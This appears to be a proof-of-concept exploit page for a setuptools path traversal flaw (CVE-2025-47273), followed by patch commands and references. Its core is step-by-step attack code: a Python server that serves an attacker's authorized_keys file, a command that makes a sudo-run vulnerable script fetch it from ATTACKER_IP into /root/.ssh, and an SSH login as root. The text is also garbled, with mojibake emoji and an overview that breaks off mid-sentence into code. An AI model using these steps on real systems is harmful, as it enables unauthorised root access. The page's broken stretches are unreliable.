Share
## https://sploitus.com/exploit?id=4AF38BD3-3ABD-5ED4-85FB-5FBDA807E30A
# setuptools Path Traversal CVE-2025-47273
## ๐ Overview
Proof-of-concept exploit for a path traversal vulnerability in **Python setuptools python_server.py << 'EOF'
import http.server
import socketserver
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# Serve authorized_keys regardless of path requested
self.send_response(200)
self.end_headers()
with open("authorized_keys", "rb") as f:
self.wfile.write(f.read())
with socketserver.TCPServer(("", 80), Handler) as httpd:
httpd.serve_forever()
EOF
python3 python_server.py
```
---
### ๐ฅ Step 3 โ Trigger the path traversal (Victim Machine)
```bash
ATTACKER_IP="192.168.1.20"
TARGET_USER="root"
sudo python3 /path/to/vulnerable_script.py \
"http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"
```
---
### ๐พ Step 4 โ Login as root (Attacker Machine)
```bash
ssh root@VICTIM_IP
```
No password. Direct root shell. ๐
---
## ๐ Patch
Version 78.1.1 fixes the issue.
| Package Manager | Command |
|---|---|
| ๐ pip | `pip install --upgrade setuptools` |
| ๐ง Debian/Ubuntu | `sudo apt upgrade python3-setuptools` |
| ๐ฉ RHEL/Fedora | `sudo dnf upgrade python3-setuptools` |
| ๐๏ธ Manual | [setuptools releases](https://github.com/pypa/setuptools/releases) |
---
## ๐ References
- ๐ [NVD โ CVE-2025-47273](https://nvd.nist.gov/vuln/detail/CVE-2025-47273)
- ๐ [GitHub Advisory โ GHSA-5rjg-fvgr-3xxf](https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf)
- ๐ [setuptools Fix Commit](https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b)
- ๐ [setuptools poc](https://github.com/pypa/setuptools/issues/4946)
---
## โ๏ธ Disclaimer and Terms
This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.
- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.